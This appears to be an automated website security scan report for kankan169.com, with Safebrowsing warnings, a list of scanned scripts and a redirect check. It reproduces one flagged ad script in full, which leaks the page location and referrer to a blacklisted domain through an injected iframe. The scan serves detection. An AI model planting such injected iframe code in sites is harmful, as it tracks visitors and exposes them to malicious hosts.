Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kankan169.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kankan169.com/ | 200 OK Content-Length: 276521 Content-Type: text/html | clean |
http://1.555lu.com/page/?s=5843 | 200 OK Content-Length: 12 Content-Type: text/html | clean |
http://1.555lu.com/test404page.js | 200 OK Content-Length: 3169 Content-Type: text/html | clean |
http://1.555lu.com/ | 200 OK Content-Length: 3169 Content-Type: text/html | clean |
http://www.kankan169.com/Public/js/jquery.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:49 GMT Accept-Ranges: bytes ETag: "01a0397671cd1:2299" Server: IIS Content-Length: 84362 Content-Location: http://www.kankan169.com/Public/js/jquery.js Content-Type: application/x-javascript Last-Modified: Fri, 03 Aug 2012 12:48:04 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/public/js/jquery.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:50 GMT Accept-Ranges: bytes ETag: "01a0397671cd1:2299" Server: IIS Content-Length: 84362 Content-Location: http://www.kankan169.com/public/js/jquery.js Content-Type: application/x-javascript Last-Modified: Fri, 03 Aug 2012 12:48:04 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/Tpl/qire/js/jquery-autocomplete.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:51 GMT Accept-Ranges: bytes ETag: "f4b1a7915e3ccf1:2299" Server: IIS Content-Length: 14091 Content-Location: http://www.kankan169.com/Tpl/qire/js/jquery-autocomplete.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/tpl/qire/js/jquery-autocomplete.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:53 GMT Accept-Ranges: bytes ETag: "f4b1a7915e3ccf1:2299" Server: IIS Content-Length: 14091 Content-Location: http://www.kankan169.com/tpl/qire/js/jquery-autocomplete.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/Public/js/jquery-lazyload.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:54 GMT Accept-Ranges: bytes ETag: "01a0397671cd1:2299" Server: IIS Content-Length: 2522 Content-Location: http://www.kankan169.com/Public/js/jquery-lazyload.js Content-Type: application/x-javascript Last-Modified: Fri, 03 Aug 2012 12:48:04 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/public/js/jquery-lazyload.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:54 GMT Accept-Ranges: bytes ETag: "01a0397671cd1:2299" Server: IIS Content-Length: 2522 Content-Location: http://www.kankan169.com/public/js/jquery-lazyload.js Content-Type: application/x-javascript Last-Modified: Fri, 03 Aug 2012 12:48:04 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/Tpl/qire/js/jquery.base.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:54 GMT Accept-Ranges: bytes ETag: "100b6915e3ccf1:2299" Server: IIS Content-Length: 2375 Content-Location: http://www.kankan169.com/Tpl/qire/js/jquery.base.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/tpl/qire/js/jquery.base.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:55 GMT Accept-Ranges: bytes ETag: "100b6915e3ccf1:2299" Server: IIS Content-Length: 2375 Content-Location: http://www.kankan169.com/tpl/qire/js/jquery.base.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/Tpl/qire/js/home.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:55 GMT Accept-Ranges: bytes ETag: "d86399915e3ccf1:2299" Server: IIS Content-Length: 15145 Content-Location: http://www.kankan169.com/Tpl/qire/js/home.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kankan169.com/tpl/qire/js/home.js | HTTP/1.1 200 OK Date: Tue, 01 Jul 2014 18:33:56 GMT Accept-Ranges: bytes ETag: "d86399915e3ccf1:2299" Server: IIS Content-Length: 15145 Content-Location: http://www.kankan169.com/tpl/qire/js/home.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Mar 2014 12:45:08 GMT X-Powered-By: WAF/2.0 | clean |
http://a.okokw.com/ps.aspx?pid=2449 | 200 OK Content-Length: 15 Content-Type: text/html | clean |
http://js.qianbaidu.me/page/?s=596 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.qianbaidu.me/page/s.php?s=597&w=960&h=90 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://1.555lu.com/page/s.php?s=5842&w=960&h=90 | 200 OK Content-Length: 659 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 1.32ir.com var _Zref=escape(document.referrer), _Zloc=escape(window.location);
if(window.top.location!=document.location){try {_Zref = escape(top.document.referrer)} catch (e) {}try {_Zloc = escape(top.location)} catch (e) {}} function _Zhv_(){var a=0;if(window.top.location==document.location && document.body ){var j=document.body.scrollHeight,v=document.body.clientHeight;if(v&&j){a=Math.round(j);}} return a;} document.write('<iframe src="http://1.32ir.com/page/?s=5842&loc='+_Zloc+'&ref='+_Zref+'&zhv='+_Zhv_()+'" width="960" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>'); Malicious iFrame found. size: 960x90 src: http://1.32ir.com/page/?s=5842&loc= This URL is marked by Google as suspicious <iframe src="http://1.32ir.com/page/?s=5842&loc='+_zloc+'&ref='+_zref+'&zhv='+_zhv_()+'" width="960" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kankan169.com
Result:
GET / HTTP/1.1
Host: kankan169.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kankan169.com
Referer: http://www.google.com/search?q=kankan169.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kankan169.com
Referer: http://www.google.com/search?q=kankan169.com
Result:
The result is similar to the first query. There are no suspicious redirects found.